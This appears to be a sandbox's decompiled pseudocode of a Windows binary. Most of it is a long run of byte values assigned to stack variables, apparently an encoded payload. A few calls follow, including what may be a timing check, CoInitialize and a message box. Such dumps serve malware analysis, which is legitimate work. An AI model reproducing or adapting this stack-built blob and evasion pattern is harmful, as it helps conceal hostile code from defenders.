                                                                                                      				_v761 = 0x3c;
                                                                                                      				_v760 = 0xa8;
                                                                                                      				_v759 = 0x2c;
                                                                                                      				_v758 = 7;
                                                                                                      				_v757 = 0x70;
                                                                                                      				_v756 = 0x1b;
                                                                                                      				_v755 = 0x27;
                                                                                                      				_v754 = 0x7c;
                                                                                                      				_v753 = 0x8b;
                                                                                                      				_v752 = 0xfa;
                                                                                                      				_v751 = 0x3b;
                                                                                                      				_v750 = 0x9b;
                                                                                                      				_v749 = 0xfe;
                                                                                                      				_v748 = 0x16;
                                                                                                      				_v747 = 0xb2;
                                                                                                      				_v746 = 0xae;
                                                                                                      				_v745 = 0xe7;
                                                                                                      				_v744 = 0x54;
                                                                                                      				_v743 = 0x52;
                                                                                                      				_v742 = 0x12;
                                                                                                      				_v741 = 0xbd;
                                                                                                      				_v740 = 0x1c;
                                                                                                      				_v739 = 0xac;
                                                                                                      				_v738 = 0xa;
                                                                                                      				_v737 = 0x48;
                                                                                                      				_v736 = 0x46;
                                                                                                      				_v735 = 0x32;
                                                                                                      				_v734 = 0xae;
                                                                                                      				_v733 = 0xb;
                                                                                                      				_v732 = 2;
                                                                                                      				_v731 = 0x54;
                                                                                                      				_v730 = 2;
                                                                                                      				_v729 = 0x6b;
                                                                                                      				_v728 = 0xa6;
                                                                                                      				_v727 = 0x12;
                                                                                                      				_v726 = 0xcd;
                                                                                                      				_v725 = 0x62;
                                                                                                      				_v724 = 0x18;
                                                                                                      				_v723 = 5;
                                                                                                      				_v722 = 0x3c;
                                                                                                      				_v721 = 0xb6;
                                                                                                      				_v720 = 0x1d;
                                                                                                      				_v719 = 0x4f;
                                                                                                      				_v718 = 0x4f;
                                                                                                      				_v717 = 0;
                                                                                                      				_v716 = 0xad;
                                                                                                      				_v715 = 0x9b;
                                                                                                      				_v714 = 0x7e;
                                                                                                      				_v713 = 0x95;
                                                                                                      				_v712 = 0xb8;
                                                                                                      				_v711 = 0x76;
                                                                                                      				_v710 = 0xf3;
                                                                                                      				_v709 = 0xa9;
                                                                                                      				_v708 = 0x21;
                                                                                                      				_v707 = 0x7c;
                                                                                                      				_v706 = 0x83;
                                                                                                      				_v705 = 0xed;
                                                                                                      				_v704 = 0x7b;
                                                                                                      				_v703 = 0x2d;
                                                                                                      				_v702 = 0xbf;
                                                                                                      				_v701 = 0x60;
                                                                                                      				_v700 = 0x4d;
                                                                                                      				_v699 = 0x1a;
                                                                                                      				_v698 = 0x60;
                                                                                                      				_v697 = 0x26;
                                                                                                      				_v696 = 0xd9;
                                                                                                      				_v695 = 0x2b;
                                                                                                      				_v694 = 0x6c;
                                                                                                      				_v693 = 0x60;
                                                                                                      				_v692 = 0xce;
                                                                                                      				_v691 = 0xec;
                                                                                                      				_v690 = 0x20;
                                                                                                      				_v689 = 0x6d;
                                                                                                      				_v688 = 0x9d;
                                                                                                      				_v687 = 0x62;
                                                                                                      				_v686 = 0xd4;
                                                                                                      				_v685 = 0x22;
                                                                                                      				_v684 = 0x50;
                                                                                                      				_v683 = 0xc2;
                                                                                                      				_v682 = 0x98;
                                                                                                      				_v681 = 0x69;
                                                                                                      				_v680 = 0xf1;
                                                                                                      				_v679 = 0x29;
                                                                                                      				_v678 = 0xd9;
                                                                                                      				_v677 = 0xc3;
                                                                                                      				_v676 = 0xda;
                                                                                                      				_v675 = 0x12;
                                                                                                      				_v674 = 0xb4;
                                                                                                      				_v673 = 0x24;
                                                                                                      				_v672 = 0x6b;
                                                                                                      				_v671 = 0x28;
                                                                                                      				_v670 = 0x7e;
                                                                                                      				_v669 = 0xc2;
                                                                                                      				_v668 = 0x11;
                                                                                                      				_v667 = 0x30;
                                                                                                      				_v666 = 0xdd;
                                                                                                      				_v665 = 0x1a;
                                                                                                      				_v664 = 0x2b;
                                                                                                      				_v663 = 0x35;
                                                                                                      				_v662 = 0xe4;
                                                                                                      				_v661 = 0xd5;
                                                                                                      				_v660 = 0x7c;
                                                                                                      				_v659 = 0x83;
                                                                                                      				_v658 = 0xec;
                                                                                                      				_v657 = 0x5b;
                                                                                                      				_v656 = 0x25;
                                                                                                      				_v655 = 0x81;
                                                                                                      				_v654 = 0x5f;
                                                                                                      				_v653 = 0x4d;
                                                                                                      				_v652 = 0x6e;
                                                                                                      				_v651 = 0x67;
                                                                                                      				_v650 = 8;
                                                                                                      				_v649 = 0x16;
                                                                                                      				_v648 = 0x5c;
                                                                                                      				_v647 = 0x2f;
                                                                                                      				_v646 = 0x56;
                                                                                                      				_v645 = 0x2a;
                                                                                                      				_v644 = 0xcd;
                                                                                                      				_v643 = 0xdd;
                                                                                                      				_v642 = 0x6e;
                                                                                                      				_v641 = 0x7a;
                                                                                                      				_v640 = 0x23;
                                                                                                      				_v639 = 0x13;
                                                                                                      				_v638 = 0x25;
                                                                                                      				_v637 = 0x83;
                                                                                                      				_v636 = 6;
                                                                                                      				_v635 = 0xd5;
                                                                                                      				_v634 = 0x13;
                                                                                                      				_v633 = 0x6b;
                                                                                                      				_v632 = 1;
                                                                                                      				_v631 = 0x1f;
                                                                                                      				_v630 = 0x1a;
                                                                                                      				_v629 = 0x2a;
                                                                                                      				_v628 = 0xde;
                                                                                                      				_v627 = 0xb9;
                                                                                                      				_v626 = 0x59;
                                                                                                      				_v625 = 0x6b;
                                                                                                      				_v624 = 0x6d;
                                                                                                      				_v623 = 0xc;
                                                                                                      				_v622 = 0xad;
                                                                                                      				_v621 = 0x13;
                                                                                                      				_v620 = 0x2b;
                                                                                                      				_v619 = 0xe1;
                                                                                                      				_v618 = 0xa5;
                                                                                                      				_v617 = 0xbe;
                                                                                                      				_v616 = 0x91;
                                                                                                      				_v615 = 0x6f;
                                                                                                      				_v614 = 0x29;
                                                                                                      				_v613 = 0x35;
                                                                                                      				_v612 = 0x40;
                                                                                                      				_v611 = 0x25;
                                                                                                      				_v610 = 0xc9;
                                                                                                      				_v609 = 0x84;
                                                                                                      				_v608 = 0x21;
                                                                                                      				_v607 = 0x2c;
                                                                                                      				_v606 = 0x6f;
                                                                                                      				_v605 = 0xeb;
                                                                                                      				_v604 = 0xae;
                                                                                                      				_v603 = 0x1b;
                                                                                                      				_v602 = 0x5e;
                                                                                                      				_v601 = 0xe2;
                                                                                                      				_v600 = 0x88;
                                                                                                      				_v599 = 0x14;
                                                                                                      				_v598 = 0xa8;
                                                                                                      				_v597 = 0xf;
                                                                                                      				_v596 = 0x64;
                                                                                                      				_v595 = 0x2b;
                                                                                                      				_v594 = 0x75;
                                                                                                      				_v593 = 0x6a;
                                                                                                      				_v592 = 0x9a;
                                                                                                      				_v591 = 0xcd;
                                                                                                      				_v590 = 0x47;
                                                                                                      				_v589 = 6;
                                                                                                      				_v588 = 0xe0;
                                                                                                      				_v587 = 0x62;
                                                                                                      				_v586 = 0x74;
                                                                                                      				_v585 = 0x44;
                                                                                                      				_v584 = 0x26;
                                                                                                      				_v583 = 0xb9;
                                                                                                      				_v582 = 0xe5;
                                                                                                      				_v581 = 0x1b;
                                                                                                      				_v580 = 0xb2;
                                                                                                      				_v579 = 0x19;
                                                                                                      				_v578 = 0x95;
                                                                                                      				_v577 = 0x29;
                                                                                                      				_v576 = 0x42;
                                                                                                      				_v575 = 0x6f;
                                                                                                      				_v574 = 0x95;
                                                                                                      				_v573 = 0xd4;
                                                                                                      				_v572 = 0x4b;
                                                                                                      				_v571 = 0xe8;
                                                                                                      				_v570 = 0xf6;
                                                                                                      				_v569 = 5;
                                                                                                      				_v568 = 0x7e;
                                                                                                      				_v567 = 0x90;
                                                                                                      				_v566 = 0x25;
                                                                                                      				_v565 = 0;
                                                                                                      				_v564 = 0x2a;
                                                                                                      				_v563 = 0x73;
                                                                                                      				_v562 = 0xe1;
                                                                                                      				_v561 = 0xfc;
                                                                                                      				_v560 = 0x1a;
                                                                                                      				_v559 = 0xc0;
                                                                                                      				_v558 = 0x2f;
                                                                                                      				_v557 = 0x17;
                                                                                                      				_v556 = 0x2a;
                                                                                                      				_v555 = 0x5d;
                                                                                                      				_v554 = 0x2e;
                                                                                                      				_v553 = 0x89;
                                                                                                      				_v552 = 0xbb;
                                                                                                      				_v551 = 0x29;
                                                                                                      				_v550 = 0xcb;
                                                                                                      				_v549 = 0xac;
                                                                                                      				_v548 = 0x2f;
                                                                                                      				_v547 = 0xc2;
                                                                                                      				_v546 = 0x63;
                                                                                                      				_v545 = 0x5f;
                                                                                                      				_v544 = 0x26;
                                                                                                      				_v543 = 0x74;
                                                                                                      				_v542 = 3;
                                                                                                      				_v541 = 0x57;
                                                                                                      				_v540 = 0x2f;
                                                                                                      				_v539 = 0xb2;
                                                                                                      				_v538 = 0;
                                                                                                      				_v537 = 0xaf;
                                                                                                      				_v536 = 0xb9;
                                                                                                      				_v535 = 0x8d;
                                                                                                      				_v534 = 0x5a;
                                                                                                      				_v533 = 0x3f;
                                                                                                      				_v532 = 0x59;
                                                                                                      				_v531 = 0x2a;
                                                                                                      				_v530 = 0x9a;
                                                                                                      				_v529 = 0xb;
                                                                                                      				_v528 = 0x32;
                                                                                                      				_v527 = 0x55;
                                                                                                      				_v526 = 0x3f;
                                                                                                      				_v525 = 0x6a;
                                                                                                      				_v524 = 0x69;
                                                                                                      				_v523 = 0x4b;
                                                                                                      				_v522 = 0x7c;
                                                                                                      				_v521 = 0x2e;
                                                                                                      				_v520 = 0x26;
                                                                                                      				_v519 = 0x8f;
                                                                                                      				_v518 = 0xe8;
                                                                                                      				_v517 = 0x23;
                                                                                                      				_v516 = 0x37;
                                                                                                      				_v515 = 0xed;
                                                                                                      				_v514 = 0xb9;
                                                                                                      				_v513 = 0xf6;
                                                                                                      				_v512 = 0x4d;
                                                                                                      				_v511 = 0x6e;
                                                                                                      				_v510 = 0x67;
                                                                                                      				_v509 = 0x2f;
                                                                                                      				_v508 = 0xd9;
                                                                                                      				_v507 = 0x29;
                                                                                                      				_v506 = 0xb4;
                                                                                                      				_v505 = 0x1c;
                                                                                                      				_v504 = 0xa8;
                                                                                                      				_v503 = 0xc3;
                                                                                                      				_v502 = 0xc4;
                                                                                                      				_v501 = 0x6e;
                                                                                                      				_v500 = 0x7a;
                                                                                                      				_v499 = 0x23;
                                                                                                      				_v498 = 0x1e;
                                                                                                      				_v497 = 0xad;
                                                                                                      				_v496 = 0x62;
                                                                                                      				_v495 = 0xf;
                                                                                                      				_v494 = 0x5b;
                                                                                                      				_v493 = 0xad;
                                                                                                      				_v492 = 0x8b;
                                                                                                      				_v491 = 0x11;
                                                                                                      				_v490 = 0xce;
                                                                                                      				_v489 = 0x33;
                                                                                                      				_v488 = 0x92;
                                                                                                      				_v487 = 0x1d;
                                                                                                      				_v486 = 0x39;
                                                                                                      				_v485 = 0x1c;
                                                                                                      				_v484 = 0x68;
                                                                                                      				_v483 = 0x90;
                                                                                                      				_v482 = 4;
                                                                                                      				_v481 = 0xa5;
                                                                                                      				_v480 = 0x93;
                                                                                                      				_v479 = 0x17;
                                                                                                      				_v478 = 0x2e;
                                                                                                      				_v477 = 0x56;
                                                                                                      				_v476 = 0xc7;
                                                                                                      				_v475 = 0x7f;
                                                                                                      				_v474 = 0xed;
                                                                                                      				_v473 = 0x74;
                                                                                                      				_v472 = 0xca;
                                                                                                      				_v471 = 0xff;
                                                                                                      				_v470 = 0xd5;
                                                                                                      				_v469 = 0x3b;
                                                                                                      				_v468 = 0xef;
                                                                                                      				_v467 = 0x89;
                                                                                                      				_v466 = 0xfe;
                                                                                                      				_v465 = 0x4d;
                                                                                                      				_v464 = 0x6e;
                                                                                                      				_v463 = 0x67;
                                                                                                      				_v462 = 0x2b;
                                                                                                      				_v461 = 0x61;
                                                                                                      				_v460 = 0xa7;
                                                                                                      				_v459 = 0x7b;
                                                                                                      				_v458 = 0x82;
                                                                                                      				_v457 = 0x6d;
                                                                                                      				_v456 = 0xcd;
                                                                                                      				_v455 = 0xa5;
                                                                                                      				_v454 = 0x91;
                                                                                                      				_v453 = 0x85;
                                                                                                      				_v452 = 0x76;
                                                                                                      				_v451 = 0xaf;
                                                                                                      				_v450 = 0x62;
                                                                                                      				_v449 = 0x4d;
                                                                                                      				_v448 = 0xe0;
                                                                                                      				_v447 = 0x8c;
                                                                                                      				_v446 = 0x66;
                                                                                                      				_v445 = 0x74;
                                                                                                      				_v444 = 0x44;
                                                                                                      				_v443 = 0x52;
                                                                                                      				_v442 = 0x18;
                                                                                                      				_v441 = 0xae;
                                                                                                      				_v440 = 0xdd;
                                                                                                      				_v439 = 0xef;
                                                                                                      				_v438 = 0x59;
                                                                                                      				_v437 = 0x6b;
                                                                                                      				_v436 = 0x6d;
                                                                                                      				_v435 = 1;
                                                                                                      				_v434 = 0xad;
                                                                                                      				_v433 = 0x21;
                                                                                                      				_v432 = 0x27;
                                                                                                      				_v431 = 0x72;
                                                                                                      				_v430 = 0x86;
                                                                                                      				_v429 = 0x30;
                                                                                                      				_v428 = 0x35;
                                                                                                      				_v427 = 0x5c;
                                                                                                      				_v426 = 0xe9;
                                                                                                      				_v425 = 0x74;
                                                                                                      				_v424 = 0x8b;
                                                                                                      				_v423 = 0xff;
                                                                                                      				_v422 = 0x3b;
                                                                                                      				_v421 = 0xef;
                                                                                                      				_v420 = 0xf7;
                                                                                                      				_v419 = 0xa1;
                                                                                                      				_v418 = 0x9d;
                                                                                                      				_v417 = 0x23;
                                                                                                      				_v416 = 0xea;
                                                                                                      				_v415 = 0x18;
                                                                                                      				_v414 = 0x5a;
                                                                                                      				_v413 = 0x2e;
                                                                                                      				_v412 = 0xc3;
                                                                                                      				_v411 = 0x56;
                                                                                                      				_v410 = 0x6d;
                                                                                                      				_v409 = 0xcb;
                                                                                                      				_v408 = 0xac;
                                                                                                      				_v407 = 0x1b;
                                                                                                      				_v406 = 0x93;
                                                                                                      				_v405 = 0x6f;
                                                                                                      				_v404 = 0xd4;
                                                                                                      				_v403 = 0x6b;
                                                                                                      				_v402 = 0x7c;
                                                                                                      				_v401 = 0xa;
                                                                                                      				_v400 = 0xdd;
                                                                                                      				_v399 = 0xaf;
                                                                                                      				_v398 = 0;
                                                                                                      				_v397 = 0x6b;
                                                                                                      				_v396 = 0xad;
                                                                                                      				_v395 = 0xbb;
                                                                                                      				_v394 = 0x81;
                                                                                                      				_v393 = 0x5a;
                                                                                                      				_v392 = 0x3f;
                                                                                                      				_v391 = 0x59;
                                                                                                      				_v390 = 0xee;
                                                                                                      				_v389 = 0xad;
                                                                                                      				_v388 = 0x39;
                                                                                                      				_v387 = 3;
                                                                                                      				_v386 = 0xde;
                                                                                                      				_v385 = 0xf7;
                                                                                                      				_v384 = 0x26;
                                                                                                      				_v383 = 0xe6;
                                                                                                      				_v382 = 0xfc;
                                                                                                      				_v381 = 0x38;
                                                                                                      				_v380 = 0xd7;
                                                                                                      				_v379 = 0x82;
                                                                                                      				_v378 = 0x9f;
                                                                                                      				_v377 = 0xaa;
                                                                                                      				_v376 = 0x80;
                                                                                                      				_v375 = 0xd9;
                                                                                                      				_v374 = 0xce;
                                                                                                      				_v373 = 0x96;
                                                                                                      				_v372 = 0xf4;
                                                                                                      				_v371 = 5;
                                                                                                      				_v370 = 0x99;
                                                                                                      				_v369 = 0x86;
                                                                                                      				_v368 = 0xe5;
                                                                                                      				_v367 = 0xdd;
                                                                                                      				_v366 = 0xc7;
                                                                                                      				_v365 = 0x48;
                                                                                                      				_v364 = 0x50;
                                                                                                      				_v363 = 0x25;
                                                                                                      				_v362 = 6;
                                                                                                      				_v361 = 0xad;
                                                                                                      				_v360 = 0x84;
                                                                                                      				_v359 = 0x79;
                                                                                                      				_v358 = 0x6b;
                                                                                                      				_v357 = 0x5c;
                                                                                                      				_v356 = 0xed;
                                                                                                      				_v355 = 0x35;
                                                                                                      				_v354 = 0x6c;
                                                                                                      				_v353 = 0x8d;
                                                                                                      				_v352 = 0x27;
                                                                                                      				_v351 = 0x8b;
                                                                                                      				_v350 = 0x95;
                                                                                                      				_v349 = 0xad;
                                                                                                      				_v348 = 0x7b;
                                                                                                      				_v347 = 0xd;
                                                                                                      				_v346 = 0x17;
                                                                                                      				_v345 = 0xb4;
                                                                                                      				_v344 = 0x9c;
                                                                                                      				_v343 = 0x23;
                                                                                                      				_v342 = 0xe6;
                                                                                                      				_v341 = 0x43;
                                                                                                      				_v340 = 0x6e;
                                                                                                      				_v339 = 0x56;
                                                                                                      				_v338 = 0xfc;
                                                                                                      				_v337 = 0x2b;
                                                                                                      				_v336 = 0xe6;
                                                                                                      				_v335 = 0xea;
                                                                                                      				_v334 = 0x8f;
                                                                                                      				_v333 = 0xbf;
                                                                                                      				_v332 = 0x61;
                                                                                                      				_v331 = 0xbe;
                                                                                                      				_v330 = 0xc3;
                                                                                                      				_v329 = 0x62;
                                                                                                      				_v328 = 0xfa;
                                                                                                      				_v327 = 0x3a;
                                                                                                      				_v326 = 0x24;
                                                                                                      				_v325 = 0xb5;
                                                                                                      				_v324 = 0x4f;
                                                                                                      				_v323 = 0x5d;
                                                                                                      				_v322 = 0xa7;
                                                                                                      				_v321 = 0x26;
                                                                                                      				_v320 = 0xd3;
                                                                                                      				_v319 = 0xa3;
                                                                                                      				_v318 = 0x10;
                                                                                                      				_v317 = 0x51;
                                                                                                      				_v316 = 0x25;
                                                                                                      				_v315 = 0x4e;
                                                                                                      				_v314 = 0x2d;
                                                                                                      				_v313 = 0x31;
                                                                                                      				_v312 = 0x3b;
                                                                                                      				_v311 = 0x7d;
                                                                                                      				_v310 = 0x1e;
                                                                                                      				_v309 = 0x7b;
                                                                                                      				_v308 = 0x35;
                                                                                                      				_v307 = 0x1b;
                                                                                                      				_v306 = 7;
                                                                                                      				_v305 = 0x38;
                                                                                                      				_v304 = 0x2f;
                                                                                                      				_v303 = 0x19;
                                                                                                      				_v302 = 0xe5;
                                                                                                      				_v301 = 0xf0;
                                                                                                      				_v300 = 0x6d;
                                                                                                      				_v299 = 0xd1;
                                                                                                      				_v298 = 0xfb;
                                                                                                      				_v297 = 0x11;
                                                                                                      				_v296 = 0xe2;
                                                                                                      				_v295 = 0x35;
                                                                                                      				_v294 = 0x45;
                                                                                                      				_v293 = 0x6e;
                                                                                                      				_v292 = 0xdc;
                                                                                                      				_v291 = 0x57;
                                                                                                      				_v290 = 0x7a;
                                                                                                      				_v289 = 0x25;
                                                                                                      				_v288 = 0xb6;
                                                                                                      				_v287 = 0;
                                                                                                      				_v286 = 0x77;
                                                                                                      				_v285 = 0x61;
                                                                                                      				_v284 = 0xbc;
                                                                                                      				_v283 = 0x78;
                                                                                                      				_v282 = 0xa;
                                                                                                      				_v281 = 0x32;
                                                                                                      				_v280 = 0x32;
                                                                                                      				_v279 = 0x74;
                                                                                                      				_v278 = 0xdd;
                                                                                                      				_v277 = 0xa1;
                                                                                                      				_v276 = 0x7e;
                                                                                                      				_v275 = 2;
                                                                                                      				_v274 = 0x26;
                                                                                                      				_v273 = 0xd9;
                                                                                                      				_v272 = 0x63;
                                                                                                      				_v271 = 0x6d;
                                                                                                      				_v270 = 0x30;
                                                                                                      				_v269 = 0x25;
                                                                                                      				_v268 = 0x4e;
                                                                                                      				_v267 = 0x6c;
                                                                                                      				_v266 = 0xe5;
                                                                                                      				_v265 = 0x93;
                                                                                                      				_v264 = 0x66;
                                                                                                      				_v263 = 0x6c;
                                                                                                      				_v262 = 0xd0;
                                                                                                      				_v261 = 0x3c;
                                                                                                      				_v260 = 0xcc;
                                                                                                      				_v259 = 8;
                                                                                                      				_v258 = 0x7e;
                                                                                                      				_v257 = 0x38;
                                                                                                      				_v256 = 0xcf;
                                                                                                      				_v255 = 0x74;
                                                                                                      				_v254 = 0x2c;
                                                                                                      				_v253 = 0x68;
                                                                                                      				_v252 = 0xd1;
                                                                                                      				_v251 = 0x7d;
                                                                                                      				_v250 = 0x69;
                                                                                                      				_v249 = 0x26;
                                                                                                      				_v248 = 0xe8;
                                                                                                      				_v247 = 0x8d;
                                                                                                      				_v246 = 0x29;
                                                                                                      				_v245 = 0xd1;
                                                                                                      				_v244 = 0x88;
                                                                                                      				_v243 = 0x6a;
                                                                                                      				_v242 = 0x6d;
                                                                                                      				_v241 = 0x3f;
                                                                                                      				_v240 = 0x31;
                                                                                                      				_v239 = 0x60;
                                                                                                      				_v238 = 0x39;
                                                                                                      				_v237 = 0x77;
                                                                                                      				_v236 = 0x58;
                                                                                                      				_v235 = 0x63;
                                                                                                      				_v234 = 0x10;
                                                                                                      				_v233 = 0x24;
                                                                                                      				_v232 = 0;
                                                                                                      				_v231 = 0x1f;
                                                                                                      				_v230 = 0xc6;
                                                                                                      				_v229 = 0xb8;
                                                                                                      				_v228 = 0x2a;
                                                                                                      				_v227 = 0xe5;
                                                                                                      				_v226 = 0x40;
                                                                                                      				_v225 = 0x94;
                                                                                                      				_v224 = 0x47;
                                                                                                      				_v223 = 0x2f;
                                                                                                      				_v222 = 0x21;
                                                                                                      				_v221 = 0x6a;
                                                                                                      				_v220 = 0x2a;
                                                                                                      				_v219 = 0xe5;
                                                                                                      				_v218 = 0xe6;
                                                                                                      				_v217 = 0x23;
                                                                                                      				_v216 = 0xd7;
                                                                                                      				_v215 = 0x26;
                                                                                                      				_v214 = 0x74;
                                                                                                      				_v213 = 0x47;
                                                                                                      				_v212 = 0x1d;
                                                                                                      				_v211 = 0xe3;
                                                                                                      				_v210 = 0xaf;
                                                                                                      				_v209 = 0x30;
                                                                                                      				_v208 = 0xf4;
                                                                                                      				_v207 = 0x74;
                                                                                                      				_v206 = 0xae;
                                                                                                      				_v205 = 0x5e;
                                                                                                      				_v204 = 0x1b;
                                                                                                      				_v203 = 0x11;
                                                                                                      				_v202 = 0xaa;
                                                                                                      				_v201 = 0x85;
                                                                                                      				_v200 = 0x5d;
                                                                                                      				_v199 = 0x40;
                                                                                                      				_v198 = 0x11;
                                                                                                      				_v197 = 4;
                                                                                                      				_v196 = 0x9a;
                                                                                                      				_v195 = 0x1e;
                                                                                                      				_v194 = 0x1d;
                                                                                                      				_v193 = 0x38;
                                                                                                      				_v192 = 0xe4;
                                                                                                      				_v191 = 0x65;
                                                                                                      				_v190 = 0x11;
                                                                                                      				_v189 = 8;
                                                                                                      				_v188 = 0x6e;
                                                                                                      				_v187 = 0x7c;
                                                                                                      				_v186 = 0xd3;
                                                                                                      				_v185 = 0xf4;
                                                                                                      				_v184 = 0x51;
                                                                                                      				_v183 = 0xf3;
                                                                                                      				_v182 = 0x6f;
                                                                                                      				_v181 = 0xa6;
                                                                                                      				_v180 = 0xa4;
                                                                                                      				_v179 = 0x5f;
                                                                                                      				_v178 = 0xe7;
                                                                                                      				_v177 = 0x71;
                                                                                                      				_v176 = 0x31;
                                                                                                      				_v175 = 0x59;
                                                                                                      				_v174 = 0x4d;
                                                                                                      				_v173 = 0xef;
                                                                                                      				_v172 = 0xac;
                                                                                                      				_v171 = 0x9a;
                                                                                                      				_v170 = 0x20;
                                                                                                      				_v169 = 0x8f;
                                                                                                      				_v168 = 0x6e;
                                                                                                      				_v167 = 0x8b;
                                                                                                      				_v166 = 0x86;
                                                                                                      				_v165 = 0x11;
                                                                                                      				_v164 = 0xe5;
                                                                                                      				_v163 = 0x9d;
                                                                                                      				_v162 = 0x45;
                                                                                                      				_v161 = 0x53;
                                                                                                      				_v160 = 0xdb;
                                                                                                      				_v159 = 0x6e;
                                                                                                      				_v158 = 0xd7;
                                                                                                      				_v157 = 3;
                                                                                                      				_v156 = 0x41;
                                                                                                      				_v155 = 0x2f;
                                                                                                      				_v154 = 0xe6;
                                                                                                      				_v153 = 2;
                                                                                                      				_v152 = 0x3e;
                                                                                                      				_v151 = 0xde;
                                                                                                      				_v150 = 0x78;
                                                                                                      				_v149 = 0x4a;
                                                                                                      				_v148 = 0x2c;
                                                                                                      				_v147 = 0xc0;
                                                                                                      				_v146 = 0xb9;
                                                                                                      				_v145 = 0x26;
                                                                                                      				_v144 = 0x2a;
                                                                                                      				_v143 = 0xf5;
                                                                                                      				_v142 = 0x4a;
                                                                                                      				_v141 = 0xa7;
                                                                                                      				_v140 = 0x47;
                                                                                                      				_v139 = 0xec;
                                                                                                      				_v138 = 0xd7;
                                                                                                      				_v137 = 0x76;
                                                                                                      				_v136 = 0xc6;
                                                                                                      				_v135 = 0x70;
                                                                                                      				_v134 = 0x22;
                                                                                                      				_v133 = 0xe5;
                                                                                                      				_v132 = 0x8c;
                                                                                                      				_v131 = 0x2e;
                                                                                                      				_v130 = 0x4b;
                                                                                                      				_v129 = 0x88;
                                                                                                      				_v128 = 0x6d;
                                                                                                      				_v127 = 0xc3;
                                                                                                      				_v126 = 0x1a;
                                                                                                      				_v125 = 0x92;
                                                                                                      				_v124 = 0x75;
                                                                                                      				_v123 = 0x9d;
                                                                                                      				_v122 = 0x54;
                                                                                                      				_v121 = 0x6e;
                                                                                                      				_v120 = 0x8b;
                                                                                                      				_v119 = 0x84;
                                                                                                      				_v118 = 0x19;
                                                                                                      				_v117 = 0xa7;
                                                                                                      				_v116 = 0xbf;
                                                                                                      				_v115 = 0x49;
                                                                                                      				_v114 = 0x62;
                                                                                                      				_v113 = 0x3f;
                                                                                                      				_v112 = 0xfc;
                                                                                                      				_v111 = 0xde;
                                                                                                      				_v110 = 0xf6;
                                                                                                      				_v109 = 0x2c;
                                                                                                      				_v108 = 0x84;
                                                                                                      				_v107 = 0x2c;
                                                                                                      				_v106 = 0xc0;
                                                                                                      				_v105 = 0x22;
                                                                                                      				_v104 = 0x46;
                                                                                                      				_v103 = 4;
                                                                                                      				_v102 = 0xaf;
                                                                                                      				_v101 = 0x19;
                                                                                                      				_v100 = 0x31;
                                                                                                      				_v99 = 0x31;
                                                                                                      				_v98 = 0x90;
                                                                                                      				_v97 = 0xe0;
                                                                                                      				_v96 = 0x74;
                                                                                                      				_v95 = 0x83;
                                                                                                      				_v94 = 0xd3;
                                                                                                      				_v93 = 0x72;
                                                                                                      				_v92 = 0x13;
                                                                                                      				_v91 = 0xee;
                                                                                                      				_v90 = 0xb7;
                                                                                                      				_v89 = 0x15;
                                                                                                      				_v88 = 0x91;
                                                                                                      				_v87 = 0x98;
                                                                                                      				_v86 = 0x91;
                                                                                                      				_v85 = 0xd9;
                                                                                                      				_v84 = 0x20;
                                                                                                      				_v83 = 0x6c;
                                                                                                      				_v82 = 0x13;
                                                                                                      				_v81 = 0xa8;
                                                                                                      				_v80 = 0x42;
                                                                                                      				_v79 = 0x65;
                                                                                                      				_v78 = 0x27;
                                                                                                      				_v77 = 0x79;
                                                                                                      				_v76 = 0xe3;
                                                                                                      				_v75 = 0x50;
                                                                                                      				_v74 = 0x91;
                                                                                                      				_v73 = 0x60;
                                                                                                      				_v72 = 0x46;
                                                                                                      				_v71 = 0xd3;
                                                                                                      				_v70 = 0x29;
                                                                                                      				_v69 = 0x68;
                                                                                                      				_v68 = 0xd;
                                                                                                      				_v67 = 0x25;
                                                                                                      				_v66 = 0xf4;
                                                                                                      				_v65 = 0xae;
                                                                                                      				_v64 = 0x5e;
                                                                                                      				_v63 = 0xae;
                                                                                                      				_v62 = 0x10;
                                                                                                      				_v61 = 0x68;
                                                                                                      				_v60 = 0xad;
                                                                                                      				_v59 = 0xa6;
                                                                                                      				_v58 = 0x24;
                                                                                                      				_v57 = 0x66;
                                                                                                      				_v56 = 0xff;
                                                                                                      				_v55 = 0x22;
                                                                                                      				_v54 = 0xe6;
                                                                                                      				_v53 = 0x63;
                                                                                                      				_v52 = 0x54;
                                                                                                      				_v51 = 0x4f;
                                                                                                      				_v50 = 0x61;
                                                                                                      				_v49 = 0xbe;
                                                                                                      				_v48 = 0x6c;
                                                                                                      				_v47 = 0xe;
                                                                                                      				_v46 = 0x5b;
                                                                                                      				_v45 = 0x2c;
                                                                                                      				_v44 = 0xb7;
                                                                                                      				_v43 = 0x2a;
                                                                                                      				_v42 = 0x69;
                                                                                                      				_v41 = 0x5e;
                                                                                                      				_v40 = 0x2f;
                                                                                                      				_v39 = 0xe5;
                                                                                                      				_v38 = 0x2e;
                                                                                                      				_v37 = 0x43;
                                                                                                      				_v36 = 0x70;
                                                                                                      				_v35 = 0x18;
                                                                                                      				_v34 = 0xa6;
                                                                                                      				_v33 = 0x8a;
                                                                                                      				_v32 = 0x7c;
                                                                                                      				_v31 = 0x2f;
                                                                                                      				_v30 = 0x24;
                                                                                                      				_v29 = 0xe0;
                                                                                                      				_v2796 = 0xa2c;
                                                                                                      				_v2776 = 0;
                                                                                                      				E00007FF87FF87C119970(0x5f5e100, _v2792,  &_v2672); // executed
                                                                                                      				E00007FF87FF87C101490(_t2715, _t2715);
                                                                                                      				_v2760 = _t2715;
                                                                                                      				E00007FF87FF87C119970(0x5f5e100, _v2792,  &_v2704); // executed
                                                                                                      				E00007FF87FF87C1014B0(_t2715);
                                                                                                      				r9d = 0x5f5e100;
                                                                                                      				if ((E00007FF87FF87C119410(_t2703, __esp,  &_v2776,  &_v2800, _t2715) & 0x000000ff) != 0) goto 0x7c11924a;
                                                                                                      				_v2804 = 1;
                                                                                                      				goto 0x7c119252;
                                                                                                      				_v2804 = 0;
                                                                                                      				_v2808 = _v2804 & 0x000000ff;
                                                                                                      				E00007FF87FF87C101540( &_v2704); // executed
                                                                                                      				E00007FF87FF87C101540( &_v2672); // executed
                                                                                                      				_t2669 = _v2808 & 0x000000ff;
                                                                                                      				if (_t2669 == 0) goto 0x7c119382;
                                                                                                      				E00007FF87FF87C119F00();
                                                                                                      				__imp__CoInitialize();
                                                                                                      				_v2780 = _t2669;
                                                                                                      				if (_v2780 >= 0) goto 0x7c1192bb;
                                                                                                      				r9d = 0;
                                                                                                      				r8d = 0;
                                                                                                      				MessageBoxA(??, ??, ??, ??);
                                                                                                      				goto 0x7c1193ea;
                                                                                                      				r9d = 0x64;
                                                                                                      				LoadStringW(??, ??, ??, ??);
                                                                                                      				r9d = 0x64;
